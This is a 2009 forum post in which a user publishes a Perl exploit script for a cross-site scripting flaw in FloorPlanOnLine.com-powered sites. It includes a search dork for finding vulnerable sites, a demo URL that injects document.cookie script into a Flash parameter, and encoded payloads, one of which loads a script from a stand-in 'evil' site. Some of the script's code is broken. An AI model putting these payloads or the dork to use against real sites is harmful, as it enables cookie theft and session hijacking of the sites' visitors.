FloorPlanOnLine.com Remote XSS Vulnerability

Moderator: Mod

FloorPlanOnLine.com Remote XSS Vulnerability

Postby kmkz » Sat Feb 07, 2009 3:06 pm

[code:1:d7acacbdbc]#!/usr/local/bin/perl -w

use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;



my %options;
getopts('TeE', \%options) ;

my $test = $options{T};
my $encode = $options{e};
my $exploit = $options{E};



if ($test)
{


my @target = @ARGV;
if (@target == 0)
{
usage();
close;
}

my $files=('javascript:alert:document.cookie');



#--------------------------------------------------------------------------------

my $socket=IO::Socket::INET->new(Proto=>"tcp",PeerAdr=>"@target",PeerPort=>"80") || die " [-] Target not found (!)\n\n";
$socket = ("@target$files");

print "[+] Connecting in @target .... \n\n ";
print "\n\n\r
[*]...Exploit Done!\n\n";




system "firefox $socket";




}

elsif($encode)
{
print "/-------------------------------------------------------------------------------------\

[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com


--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";



print "
@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Encoded XSS Injections @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@


(1) Cookie --> javascript%3Aalert%3Adocument.cookie\n\n
(2) Inclusion of evil Script --> %3C%20script%20src=%20[http://www.you-evil-site/bad.js]%20%3E%3C/script%3E \n\n
(3) Image Inclusion --> %3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.image%5B0%5D.src%3D%22http%3A%2F%2F[your_site.com]%2F[image.jpg]%22%3B%3C%2Fscript%3E \n\n\n";
exit(1);



}


if($exploit)
{
print "/-------------------------------------------------------------------------------------\

[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com

--------------------------------------------------------------------------------------

[*]Can be exploited by malicious people to conduct cross-site scripting attacks.

-Input passed to the (URLPARAM) variable is not properly sanitised before
being returned to the user.


-This bug can be exploited to execute arbitrary script code in a user's browse

session in context of an affected site.

--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";
exit(1);
}

else{
print "[-] Missing Argument (!) \n";
usage();
exit;
}





sub usage{
print"\n";
die <<EOF;
Usage $0: [-f# -S# -p# -l]


-T (Target) : test a defined target (url)
-e (encode) : give exemples of encoded XSS injection
-E (Exploit): to see my original exploit (avaible on Milw0rm )

-----------------------------------------------------------

Contact "kmkz" for more informations.

Mail: kmkz[at]live[dot]fr.
WebSite: http://kmkz-web-blog.blogspot.com
Board: www.collective-utopia.no-ip.fr
EOF
}[/code:1:d7acacbdbc]
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 0 guests

cron